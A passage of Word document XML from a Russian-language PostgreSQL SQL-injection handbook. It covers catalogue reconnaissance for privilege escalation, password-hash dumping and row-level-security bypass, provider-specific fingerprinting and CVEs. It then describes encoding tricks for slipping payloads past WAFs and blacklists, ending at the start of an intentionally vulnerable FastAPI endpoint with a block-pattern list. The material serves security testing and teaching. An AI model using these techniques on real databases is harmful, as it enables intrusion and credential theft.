          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.8.1 даёт имена пользовательских таблиц для WITH-INSERT/UPDATE/DELETE.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 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.8.2 Payload A с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosecdef = true AND owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — прямой источник целей для 3.13. После успешной 3.13 → 3.8.3 Payload B для дампа паролей.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3.8.2 Payload B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 источник кандидатов для 3.16: атакующий читает тела функций, ищет в них </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('%s', ...)</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EXECUTE '...' ||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 (RLS bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.8.3 Payload A (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_roles.rolbypassrls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — карта целевых ролей для SET ROLE bypass. 3.8.6 (R26 CVE-2025-8713) — частный случай того же класса CVE, который в 3.17.4 разбирается с точки зрения RLS-моделирования.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Раздел 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server_version_num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из 3.8.4 — ключ к версионным таблицам в 4.6. R17 и R26 целиком разбираются в 4.4/4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Большая часть 3.8 работает на managed-PG так же, как на self-hosted —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структурно открыт PUBLIC, провайдеры его не ограничивают (это сломало бы ORM и инструменты миграции). Что меняется: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3.8.1 / 3.8.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в выборке появляются служебные таблицы/функции провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds_*</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cloudsqladmin.*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supabase_*</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pg_graphql.*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pgsodium.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — это сам по себе fingerprint, какой провайдер хостит инстанс.</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3.8.3 Payload B (хеши)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">структурно недоступна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на всех major-провайдерах.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не имеют SUPERUSER-флага;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не выдаётся. Хеши паролей видны только провайдеру.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3.8.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — версия включает кастомный suffix (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-rds-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-google-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pg_settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> частично masked;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показывает преинсталлированный набор провайдера → мгновенный fingerprint.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3.8.6 R17 (CVE-2024-4317)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — может оставаться открытой на managed-инстансах, даже если minor patch применён, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`fix-CVE-2024-4317.sql` не выполняется автоматически</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при provider-managed upgrade. Это специфика managed: на self-hosted DBA либо запускает скрипт сразу при апгрейде, либо не апгрейдится вообще; на managed апгрейд автоматический, а ручной шаг забывается.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3.8.6 R26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фикс через бинарь, применяется автоматически в maintenance window. До window — инстанс на managed уязвим так же, как self-hosted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детально по провайдерам и таблицы патч-окон — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.9 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обход символьных и лексических фильтров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые ставят между пользовательским вводом и базой данных. Сами payload-ы из 3.1–3.8 — UNION, dblink, pg_read_file и т.п. — здесь не меняются по существу; меняется их кодировка, чтобы протолкнуть payload через WAF, blacklist в коде приложения или sanitizer-функцию, блокирующую конкретные символы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ключевые слова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 1=1</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В отличие от 3.1–3.8 — где целевая «жертва» это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-builder в приложении</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который конкатенирует строки — здесь целевая жертва это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">фильтр на входе</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAF, blacklist-regex в коде, sanitization-функция). Если фильтр пропустил payload, дальше всё работает по обычным правилам соответствующей категории атаки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда применять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(ModSecurity / CRS / Cloudflare / AWS WAF / Imperva)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ставит regex-правила на тело запроса. CRS правила SQLi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">942100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942521</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) ловят популярные сигнатуры; PG-специфичные обходы из 3.9 часто не покрыты.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Blacklist в коде</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — самописная функция «уберём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из параметра», </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if "DROP" in payload: reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.п. Это распространённый антипаттерн; почти любой подраздел 3.9 такой фильтр обходит.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Whitelist на типы, но не на содержимое</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметр объявлен как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, проходит type-check, но содержимое не валидируется. 3.9.6 (regex/whitespace tricks) часто эксплуатирует такие случаи.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не применять, если ввод действительно идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">через параметризацию</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в API драйвера, не f-string). 3.9 не побеждает параметризацию — она побеждает фильтрацию строкового payload-а. Если параметризация в коде есть и работает (см. 2.1 и 3.5), любая 3.9-кодировка просто попадёт в значение параметра как литерал, не интерпретируется как SQL.</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3.9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dollar-quoted strings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$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (R5) — альтернатива одинарной кавычке для литералов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 конкатенация — собрать строку по байтам, не используя символьные литералы вообще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3.9.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;'\0027'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация SQL/Unicode для построения литералов через codepoint-ы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3.9.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escape strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'\x27'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — backslash-escape с hex/octal byte literals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3.9.5</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convert_from(decode('27...', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — построение строки через декодирование hex/base64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3.9.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Регистр keywords, whitespace tricks — обход case-sensitive blacklist, использование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Unicode-пробелов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3.9.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обзор CVE-2025-1094 (encoding-bypass в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R6) — отдельный класс обхода через невалидный UTF-8 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral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PQescapeIdentifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; полный разбор — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Тестовый эндпоинт (используется в 3.9.1–3.9.7 как общий уязвимый код)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все подразделы 3.9.x используют один и тот же FastAPI-эндпоинт с двойным фильтром на входе. Чтобы не дублировать его в каждой карточке, опишем здесь — в подразделах будет указано «уязвимый код — см. 3.9.0» и приведён </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только тот payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который обходит соответствующий конкретный фильтр.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/search.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import re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 HTTPException</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Реалистичный pattern-based WAF — НЕ блокирует `'` целиком (легитимные O'Brien),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># а ловит опасные сочетания символов с ключевыми словами и опасные функции/каталоги.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BLOCKED_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
